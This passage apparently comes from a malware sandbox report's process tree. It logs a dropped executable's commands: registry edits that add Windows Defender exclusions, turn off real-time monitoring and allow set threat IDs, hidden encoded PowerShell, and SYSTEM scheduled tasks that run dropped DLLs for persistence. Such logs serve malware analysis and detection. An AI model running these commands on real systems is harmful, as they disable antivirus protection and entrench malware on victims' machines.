C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\eqfCDMxNLExrjrYoz" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HKomOEKiubDeyUja" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HKomOEKiubDeyUja" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gfUGInsuA" /SC once /ST 02:46:04 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gfUGInsuA"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gfUGInsuA"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "emrEEeoVdUigmulhl" /SC once /ST 00:57:37 /RU "SYSTEM" /TR "\"C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\XazPKXQ.exe\" 4u /CXzDdidFt 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "emrEEeoVdUigmulhl"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1500 -s 6203⤵
- Loads dropped DLL
- Program crash
-
C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\XazPKXQ.exeC:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\XazPKXQ.exe 4u /CXzDdidFt 525403 /S2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force7⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bcicWGWSPuqTxjDSpV"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &3⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\prAQyJMeU\JBycwM.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "rbzCIowvsKWRrhO" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "rbzCIowvsKWRrhO2" /F /xml "C:\Program Files (x86)\prAQyJMeU\jFfZtsU.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "rbzCIowvsKWRrhO"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "rbzCIowvsKWRrhO"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "yZMZGSbxnbvyuO" /F /xml "C:\Program Files (x86)\zNBDoCPwUgCU2\RhgzJni.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "IeZcDvoJstcUS2" /F /xml "C:\ProgramData\wpmocubwzvTKZWVB\gDdvuBg.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "XgRdArvYBmOriRaMM2" /F /xml "C:\Program Files (x86)\YrgxaRmWgsNWPaiiAzR\WUNLJkL.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "pKGBoMxbXyYHoUCPnwv2" /F /xml "C:\Program Files (x86)\hkBthRLftwjEC\yeVHYjE.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "EXxaHtUqjXkXqVrbU" /SC once /ST 15:56:28 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\HKomOEKiubDeyUja\zXJbCntP\dsZTmZo.dll\",#1 /gZttdidvNL 525403" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "EXxaHtUqjXkXqVrbU"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "emrEEeoVdUigmulhl"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2112 -s 9283⤵
- Loads dropped DLL
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\eqfCDMxNLExrjrYoz\YZZOhqeJLJasQiW\KVPDPJQ.exeC:\Users\Admin\AppData\Local\Temp\eqfCDMxNLExrjrYoz\YZZOhqeJLJasQiW\KVPDPJQ.exe Yw /dXqdidSHVt 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force7⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gGJXvRADW" /SC once /ST 21:30:58 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gGJXvRADW"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gGJXvRADW"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "golVNTbrK" /SC once /ST 17:55:53 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "golVNTbrK"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "golVNTbrK"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "emrEEeoVdUigmulhl" /SC once /ST 19:24:38 /RU "SYSTEM" /TR "\"C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\QCKfkfU.exe\" 4u /DIjfdidEO 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "emrEEeoVdUigmulhl"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1088 -s 2403⤵
- Loads dropped DLL
- Program crash
-
C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\QCKfkfU.exeC:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\QCKfkfU.exe 4u /DIjfdidEO 525403 /S2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force7⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bcicWGWSPuqTxjDSpV"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &3⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True7⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True7⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\prAQyJMeU\txPUSW.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "rbzCIowvsKWRrhO" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "rbzCIowvsKWRrhO2" /F /xml "C:\Program Files (x86)\prAQyJMeU\zlnYuee.xml" /RU "SYSTEM"3⤵
